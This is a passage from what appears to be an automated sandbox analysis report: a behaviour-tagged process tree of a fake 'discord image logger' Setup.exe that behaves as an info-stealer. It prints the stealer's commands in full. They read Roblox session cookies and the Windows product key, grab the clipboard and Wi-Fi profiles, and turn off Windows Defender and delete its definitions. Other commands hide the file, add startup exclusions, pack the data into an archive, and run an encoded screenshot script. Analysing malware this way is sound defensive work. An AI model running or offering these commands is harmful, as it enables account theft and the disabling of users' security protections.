                                                                PID:3212
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                              3⤵
                                                                PID:4776
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  4⤵
                                                                    PID:3684
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    4⤵
                                                                      PID:2252
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    3⤵
                                                                      PID:1100
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        4⤵
                                                                          PID:3264
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          4⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4984
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                        3⤵
                                                                          PID:4128
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            4⤵
                                                                              PID:3128
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:3384
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                            3⤵
                                                                              PID:3464
                                                                              • C:\Windows\system32\getmac.exe
                                                                                getmac
                                                                                4⤵
                                                                                  PID:2968
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\NECHb.zip" *"
                                                                                3⤵
                                                                                  PID:3864
                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI37002\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\NECHb.zip" *
                                                                                    4⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3392
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                  3⤵
                                                                                    PID:1852
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic os get Caption
                                                                                      4⤵
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:4428
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                    3⤵
                                                                                      PID:396
                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                        wmic computersystem get totalphysicalmemory
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:644
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                      3⤵
                                                                                        PID:996
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic csproduct get uuid
                                                                                          4⤵
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:884
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                        3⤵
                                                                                          PID:4740
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2676
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                          3⤵
                                                                                            PID:3212
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic path win32_VideoController get name
                                                                                              4⤵
                                                                                              • Detects videocard installed
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:2876
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                            3⤵
                                                                                              PID:4572
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                4⤵
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:3824
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""
                                                                                              3⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              PID:4568
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                ping localhost -n 3
                                                                                                4⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:2876
                                                                                        • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                                          C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          PID:4700
                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                          "C:\Windows\system32\taskmgr.exe" /0
                                                                                          1⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:2500
                                                                                        • C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe
                                                                                          "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
                                                                                          1⤵
                                                                                            PID:4136
                                                                                            • C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe
                                                                                              "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
                                                                                              2⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:2676
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'"
                                                                                                3⤵
                                                                                                  PID:2180
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'
                                                                                                    4⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:2160
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                  3⤵
                                                                                                    PID:2532
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:3060
                                                                                                    • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                      4⤵
                                                                                                      • Deletes Windows Defender Definitions
                                                                                                      PID:3160
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()""
                                                                                                    3⤵
                                                                                                      PID:3400
                                                                                                      • C:\Windows\system32\mshta.exe
                                                                                                        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()"
                                                                                                        4⤵
                                                                                                          PID:3356
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                        3⤵
                                                                                                          PID:3212
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FO LIST
                                                                                                            4⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:884
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                          3⤵
                                                                                                            PID:2352
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic csproduct get uuid
                                                                                                              4⤵
                                                                                                                PID:996
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                              3⤵
                                                                                                                PID:880
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                  4⤵
                                                                                                                    PID:4928
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                  3⤵
                                                                                                                    PID:2464
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                      4⤵
                                                                                                                        PID:5016
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                      3⤵
                                                                                                                        PID:3700
                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                          wmic path win32_VideoController get name
                                                                                                                          4⤵
                                                                                                                          • Detects videocard installed
                                                                                                                          PID:3844
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                        3⤵
                                                                                                                          PID:4236
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic path win32_VideoController get name
                                                                                                                            4⤵
                                                                                                                            • Detects videocard installed
                                                                                                                            PID:2928
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""
                                                                                                                          3⤵
                                                                                                                          • Hide Artifacts: Hidden Files and Directories
                                                                                                                          PID:3048
                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                            attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
                                                                                                                            4⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:4928
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏  .scr'"
                                                                                                                          3⤵
                                                                                                                            PID:4836
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‏  .scr'
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:3052
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                            3⤵
                                                                                                                              PID:2212
                                                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                                                tasklist /FO LIST
                                                                                                                                4⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                PID:656
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                              3⤵
                                                                                                                                PID:2160
                                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                                  tasklist /FO LIST
                                                                                                                                  4⤵
                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                  PID:1684
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                3⤵
                                                                                                                                  PID:4548
                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                    4⤵
                                                                                                                                      PID:2420
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                    3⤵
                                                                                                                                    • Clipboard Data
                                                                                                                                    PID:2872
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell Get-Clipboard
                                                                                                                                      4⤵
                                                                                                                                      • Clipboard Data
                                                                                                                                      PID:3152
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                    3⤵
                                                                                                                                      PID:2904
                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                        tasklist /FO LIST
                                                                                                                                        4⤵
                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                        PID:5348
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                      3⤵
                                                                                                                                        PID:3640
                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                          tree /A /F
                                                                                                                                          4⤵
                                                                                                                                            PID:5476
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                          3⤵
                                                                                                                                          • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                          PID:1372
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            netsh wlan show profile
                                                                                                                                            4⤵
                                                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                            PID:5504
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                          3⤵
                                                                                                                                            PID:3060
                                                                                                                                            • C:\Windows\system32\systeminfo.exe
                                                                                                                                              systeminfo
                                                                                                                                              4⤵
                                                                                                                                              • Gathers system information
                                                                                                                                              PID:5484
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                            3⤵
                                                                                                                                              PID:780
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                4⤵
                                                                                                                                                  PID:5464
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                3⤵
                                                                                                                                                  PID:4304
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAg